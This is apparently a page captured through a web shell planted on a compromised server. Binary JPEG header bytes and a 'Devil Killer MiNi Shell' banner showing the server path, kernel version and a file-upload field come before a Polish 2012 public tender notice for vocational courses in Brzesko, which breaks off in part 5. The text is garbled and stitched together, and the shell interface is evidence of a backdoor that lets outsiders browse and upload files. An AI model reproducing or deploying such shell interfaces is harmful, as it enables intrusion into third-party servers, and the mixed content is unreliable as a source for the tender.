JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120116/14443-N-2012.html

<p class="kh_header"><b>Brzesko: Kursy zawodowe mechaniczno-budowlane w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 14443 - 2012; data zamieszczenia: 16.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Brzesku , ul. Głowackiego 51, 32-800 Brzesko, woj. małopolskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatbrzeski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kursy zawodowe mechaniczno-budowlane w ramach projektu - Modernizacja  kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja kursów zawodowych budowlanych i mechanicznych w szkołach ponadgimnazjalnych, dla których organem prowadzącym jest Powiat Brzeski współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w podziale na następujące zadania:

Zadanie 1: Kurs operator obrabiarek CNC dla uczniów grupy I w ZSP nr 2 w Brzesku.
Zadanie 2: Kurs operator obrabiarek CNC dla uczniów grupy II w ZSP nr 2 w Brzesku.
Zadanie 3: Kurs elektroniki pojazdowej dla uczniów grupy I w ZSP nr 2 w Brzesku.
Zadanie 4: Kurs elektroniki pojazdowej dla uczniów grupy II w ZSP nr 2 w Brzesku.
Zadanie 5: Kurs spawacz dla uczniów grupy I ZSP nr 2 w Brzesku.
Zadanie 6: Kurs spawacz dla uczniów grupy II ZSP nr 2 w Brzesku. 
Zadanie 7: Kurs konserwacja i obsługa napędów pneumatycznych i hydraulicznych dla uczniów  ZSP nr 2 w Brzesku
Zadanie 8: Kurs konserwacja i obsługa napędów elektrycznych dla uczniów  ZSP nr 2 
w Brzesku.
Zadanie 9: Kurs fliziarz (posadzkarz, glazurnik) dla uczniów grupy I w ZSP nr 2 w Brzesku.
Zadanie 10: Kurs fliziarz (posadzkarz, glazurnik) dla uczniów grupy II w  ZSP nr 2 
w Brzesku.
Zadanie 11: Kurs na uprawnienia SEP do 1 kV dla ZSP nr 2 w Brzesku.
Zadanie 12: Kurs Kosztorysowania dla uczniów grupy I ZSP nr 2 w Brzesku.
Zadanie 13: Kurs Kosztorysowania dla uczniów grupy II ZSP nr 2 w Brzesku.

Szczegółową specyfikację każdego kursu zawarto w załączniku nr 1 do  Specyfikacji Istotnych Warunków Zamówienia (Opis przedmiotu zamówienia).

2. Szczegółowe wymagania Zamawiającego wobec Wykonawcy w ramach realizacji niniejszego zamówienia:

1) Zamawiający dopuszcza składanie ofert częściowych w podziale na w/w Zadania. Szczegółowy opis poszczególnych części zamówienia zawarto w załączniku nr 1 do SIWZ.
2) Zamawiający dopuszcza możliwość realizacji części zamówienia przez podwykonawcę.
3) Przed podpisaniem umowy Wykonawca przekaże Zamawiającemu planowany harmonogram spotkań zawierający daty i godziny prowadzonych zajęć wraz z tematami rozpisanymi zgodnie z tematyką kursu. Szczegółowy harmonogram realizacji kursu musi być uzgodniony z liderem szkolnym projektu właściwym dla każdego zadania i podpisany przez właściwego Dyrektora Szkoły.
4) Jeśli w opisie przedmiotu zamówienia - załącznik nr 1 do SIWZ określono podział na grupy to kurs musi zostać przeprowadzony dla każdej grupy oddzielnie i nie dopuszczalne jest łączenie grup celem prowadzenia wspólnych zajęć.
5) Sale i pracownie przewidziane na realizację kursu w danej szkole udostępnia się Wykonawcy nieodpłatnie jeśli w załączniku nr 1 do SIWZ określono, iż dany kurs powinien odbywać się na terenie tej właśnie szkoły. Jeśli Wykonawca zdecyduje realizować kurs w innym miejscu lub miejsce kursu nie zostało określone przez Zamawiającego to będzie on zobowiązany na własny koszt zapewnić uczestnikom kursu dojazd z siedziby Zespołu Szkół Ponadgimnazjalnych nr 2 w Brzesku, ul. Piastowska 2, 32-800 Brzesko do miejsca realizacji kursu i z powrotem. Czas dojazdu uczestników kursu nie może przekroczyć jednej godziny w jedną stronę.
6) Wykonawca jest zobowiązany zapewnić wszystkim uczestnikom kursu ubrania ochronne 
(za wyjątkiem Zadania 12 oraz Zadania 13).
7) Wykonawca może w trakcie przeprowadzania kursu korzystać z pomocy dydaktycznych będących własnością szkoły wyszczególnionych w specyfikacji - w załączniku nr 1 do SIWZ, przy czym odpowiada on za wszelkie uszkodzenia powstałe na wskutek niewłaściwego ich użytkowania. Dyrektor lub osoba przez niego upoważniona udostępnia sprzęt oraz dokonuje sprawdzenia jego stanu w obecności Wykonawcy każdorazowo przed rozpoczęciem i po zakończeniu kursu. Pozostały sprzęt niezbędny do realizacji zadania Wykonawca musi zorganizować na swój koszt.
8) Jeżeli w załączniku nr 1 do SIWZ (opis przedmiotu zamówienia) wymaga się od Wykonawcy przekazania uczestnikom kursu materiałów szkoleniowych, dydaktycznych oraz wszelkich innych produktów to wszystkie one muszą być nowe, nieużywane i oryginalnie zapakowane.
9) Wykonawca zobowiązuje się do bieżącego informowania Zamawiającego faksem, e-mailem lub pisemnie (najpóźniej w drugim dniu po zajęciach) o każdej nieobecności uczestnika na danym kursie.
10) Wykonawca jest zobowiązany prowadzić odpowiednią dokumentację w postaci:  dziennika zajęć, listy obecności z własnoręcznymi podpisami uczestników w każdym dniu szkolenia i podpisaną przez prowadzącego zajęcia (wzór listy obecności zostanie przekazany Wykonawcy przez właściwego lidera szkolnego po podpisaniu umowy na realizację kursu), listy przekazanych posiłków, materiałów biurowych, szkoleniowych/skryptów oraz wszelkich innych dokumentów i pomocy jeśli wymaga tego specyfikacja kursu określona szczegółowo w załączniku nr 1 do SIWZ, a także listy odbioru wydanych zaświadczeń/certyfikatów. Sporządzając listy przekazania uczniom wszelkich zaświadczeń, certyfikatów przedmiotów czy produktów (w tym wyżywienia) Wykonawca musi uzyskać podpis każdego ucznia potwierdzający jego faktyczny odbiór. Brak takiego podpisu jest dla Zamawiającego równoznaczny z nieprzekazaniem przedmiotu o którym mowa wyżej.
11) Wykonawca po zakończeniu kursu przeprowadzi wśród uczestników kursu ocenę merytoryczną i techniczną  przebiegu kursu na podstawie anonimowej ankiety oceniającej. 
12) Wykonawca zapewni ubezpieczenie wszystkich uczestników kursu od następstw nieszczęśliwych wypadków (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł na okres trwania kursu). Wykonawca musi posiadać polisę potwierdzającą objęcie uczestników takim ubezpieczeniem oraz przedstawić jej kserokopię najpóźniej w dniu rozpoczęcia kursu.
13) W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do: 
a) oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b) informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c) stosowania na wszystkich dokumentach w trakcie wykonywania przedmiotowego zamówienia znaków takich jak: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo Województwa Małopolskiego, logo projektu, logo powiatu brzeskiego, hasło promocyjne POKL. 
14) Każdy z uczestników zajęć (posiadający min 80% obecności) otrzyma zaświadczenie/certyfikat potwierdzający ukończenie kursu. Na zaświadczeniu/certyfikacie winny zostać umieszczone: szczegółowy zakres programowy kursu (wraz z podaniem liczby godzin poszczególnych tematów zajęć), logo projektu - wg wzoru przekazanego przez Lidera szkolnego na etapie realizacji zamówienia oraz zapis właściwy dla nazwy kursu występujący w nazwie każdego zadania tj.: np. dla zadania 1: Kurs operator obrabiarek CNC dla uczniów grupy I w ZSP nr 2 w Brzesku, będzie to sentencja:
,,Kurs operator obrabiarek CNC współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego w ramach projektu pn. Modernizacja kształcenia zawodowego w Małopolsce,,. 
Obok wyżej wymienionych zaświadczeń w przypadku realizacji Zadania 5 oraz Zadania 6,  Wykonawca wyda uczestnikom, także zaświadczenie (zawierające treści jak wyżej wymienione) na podstawie § 6 rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006 roku w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). 
Ponadto:
W przypadku Zadania 11 Wykonawca na zakończenie kursu zorganizuje na swój koszt dla każdego uczestnika który ukończył kurs egzamin państwowy przed komisją SEP, a po jego zdaniu uczestnicy otrzymają dokument potwierdzający zdobycie uprawnień SEP do 1kV (świadectwo kwalifikacji kat. E).
W przypadku Zadania 5 oraz Zadania 6 Wykonawca na swój koszt zorganizuje jednokrotne  podejście każdego uczestnika który ukończył kurs do państwowego egzaminu spawacza. Uczestnicy, którzy pozytywnie zdadzą egzamin otrzymają dokument uprawniający do wykonywania prac spawalniczych  na podstawie ,,książeczki spawacza,, ważnej na terenie kraju oraz w krajach Unii Europejskiej, certyfikat  z Instytutu Spawalnictwa w wersjach polsko-angielskiej i polsko-niemieckiej.  

15) W przypadku niemożliwości ukończenia kursu przez uczestnika z przyczyny leżącej po jego stronie (tj. długotrwałej choroby, śmierci lub dobrowolnej rezygnacji) Wykonawca zamiast zaświadczeń/certyfikatów o ukończeniu kursu, o których mowa punkcie 14 przekaże Zamawiającemu stosowne oświadczenie ze wskazaniem powodu przerwania kursu danego uczestnika.
16) Zamawiający wymaga by Wykonawca na swój koszt zapewnił podczas prowadzenia zajęć (na każdym spotkaniu) każdemu uczestnikowi posiłek w postaci drożdżówki o masie min 85g. i napoju lub soku owocowego, niegazowanego o pojemności min. 200 ml. Posiłek musi być świeży i przygotowany zgodnie z zachowaniem obowiązujących przepisów dot. higieny żywienia i żywności. 
17) W salach i pracowniach, podczas prowadzenia zajęć bez zgody koordynatora powiatowego nie mogą  przebywać inne osoby niż uczestnicy kursu oraz osoby szkolące (instruktorzy, wykładowcy).
18) Zamawiający zastrzega sobie prawo do pełnej kontroli przeprowadzanych zajęć, w tym także do sporządzania zdjęć oraz wszelkiej dokumentacji obrazującej realizację przedmiotu umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatbrzeski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Brzesku
Wydział Edukacji (Ip. pok. 102)
ul. Piastowska 2
32-800 Brzesko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.01.2012 godzina 09:00, miejsce: Starostwo Powiatowe w Brzesku
Sekretariat (IIp. pok. 213)
ul. Głowackiego 51
32-800 Brzesko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Modernizacja kształcenia zawodowego w Małopolsce. Projekt w ramach Programu Operacyjnego Kapitał Ludzki, Działanie 9.2, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1:  Kurs operator obrabiarek CNC dla uczniów grupy I w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów 

2. Czas trwania zajęć wynosi 160 godzin, w tym część teoretyczna (w tym symulacje komputerowe) - 60 godz., część praktyczna -100 godz., część praktyczna musi być realizowana na przemysłowych obrabiarkach CNC. 

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej.  Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00.  

4.Wykonawca zobowiązany jest zapewnić wszystkie elementy związane z realizacją zamówienia, to jest w szczególności: niezbędne pomoce i materiały szkoleniowe

5. Zamawiający zapewnia: 
Wyposażenie: Zestawy komputerowe 8GB/1TB/700W/Win7: 9 stanowisk, przenośna tablica interaktywna, Frezarka dydaktyczna CM55; Frezarka dydaktyczna EMCO Cocept Mill 55 z wyposażeniem: 1szt, tokarka dydaktyczna CT55; Tokarka dydaktyczna EMCO Concept Turn 55 z wyposażeniem 1szt, Pulpit podstawowy Trenażer: 1 szt., Trenażer pulpit podstawowy + nakładki Sinumerik 810/840D, Fanuc21 Heidenhain 430: 7 szt, Oprogramowanie: WinNC Sinumerik 840D; toczenie frezowanie, WinNC Fanuc21 toczenie frezowanie, WinNC Heidenhaim 430 toczenie frezowanie, #D-View PKWiU 29.40.21-15.90, CAD Edukacja oparty o SolidEdge ST PL, CAM edukacja oparty o EdgeCAM 2009 CNC CAD/CAM system MTS dydaktyczno-przemysłowe do nauki programowania oraz programowania obrabiarek rozszerzony o moduł 3D oraz TopCAM z postprocesorami 7..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 06.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Kurs operator obrabiarek CNC dla uczniów grupy II w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów 

2. Czas trwania zajęć wynosi 160 godzin, w tym część teoretyczna (w tym symulacje komputerowe) - 60 godz., część praktyczna -100 godz., część praktyczna musi być realizowana na przemysłowych obrabiarkach CNC. 

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Wykonawca zobowiązany jest zapewnić wszystkie elementy związane z realizacją zamówienia, to jest w szczególności: niezbędne pomoce i materiały szkoleniowe.

5. Zamawiający zapewnia: 
Wyposażenie: Zestawy komputerowe 8GB/1TB/700W/Win7: 9 stanowisk, przenośna tablica interaktywna, Frezarka dydaktyczna CM55; Frezarka dydaktyczna EMCO Cocept Mill 55 z wyposażeniem: 1szt, tokarka dydaktyczna CT55; Tokarka dydaktyczna EMCO Concept Turn 55 z wyposażeniem 1szt, Pulpit podstawowy Trenażer: 1 szt., Trenażer pulpit podstawowy + nakładki Sinumerik 810/840D, Fanuc21 Heidenhain 430: 7 szt, Oprogramowanie: WinNC Sinumerik 840D; toczenie frezowanie, WinNC Fanuc21 toczenie frezowanie, WinNC Heidenhaim 430 toczenie frezowanie, #D-View PKWiU 29.40.21-15.90, CAD Edukacja oparty o SolidEdge ST PL, CAM edukacja oparty o EdgeCAM 2009 CNC CAD/CAM system MTS dydaktyczno-przemysłowe do nauki programowania oraz programowania obrabiarek rozszerzony o moduł 3D oraz TopCAM z postprocesorami 7..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3:  Kurs elektroniki pojazdowej dla uczniów grupy I w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 20 uczniów  (podzielonych na 2 grupy każda po 10 uczniów)

2. Czas trwania zajęć wynosi:  40 godzin (dla każdej grupy)

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Kurs powinien uwzględniać miedzy innymi zapoznanie uczestników z diagnostyką i serwisowaniem elementów i systemów elektronicznych stosowanych w pojazdach samochodowych ze szczególnym uwzględnieniem systemów kontroli trakcji, hamulcowych, wtryskowych w samochodach z zapłonem iskrowym i samoczynnym. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń praktycznych.

5. Wykonawca zobowiązany jest zapewnić: pomoce i materiały dydaktyczne oraz sprzęt pozwalające na realizację celów kursu. 

6. Zamawiający zapewnia: pracownię samochodową (BEZ WYPOSAŻENIA W SPRZĘT NIEZBĘDNY DO REALIZACJI KURSU), rzutnik + laptop..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4:  Kurs elektroniki pojazdowej dla uczniów grupy II w ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 10 uczniów 

2. Czas trwania zajęć wynosi:  40 godzin

3. Kurs powinien zostać zorganizowany na terenie Zespołu Szkół Ponadgimnazjalnych Nr 2 w Brzesku w czasie wolnym od nauki szkolnej. Kurs odbywać się może w dni powszednie w godzinach 15:00-19:00 oraz w soboty w godzinach 8:00 - 18:00. 

4. Kurs powinien uwzględniać miedzy innymi zapoznanie uczestników z diagnostyką i serwisowaniem elementów i systemów elektronicznych stosowanych w pojazdach samochodowych ze szczególnym uwzględnieniem systemów kontroli trakcji, hamulcowych, wtryskowych w samochodach z zapłonem iskrowym i samoczynnym. Materiał powinien być realizowany metodami aktywizującymi w formie ćwiczeń praktycznych.

5. Wykonawca zobowiązany jest zapewnić: pomoce i materiały dydaktyczne oraz sprzęt pozwalające na realizację celów kursu. 

6. Zamawiający zapewnia: pracownię samochodową (BEZ WYPOSAŻENIA W SPRZĘT NIEZBĘDNY DO REALIZACJI KURSU), rzutnik + laptop.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 12.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5:  Kurs spawacz dla uczniów grupy I ZSP nr 2 w Brzesku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 15 uczniów. 

2. Czas trwania zajęć wynosi:  150 godzin
	
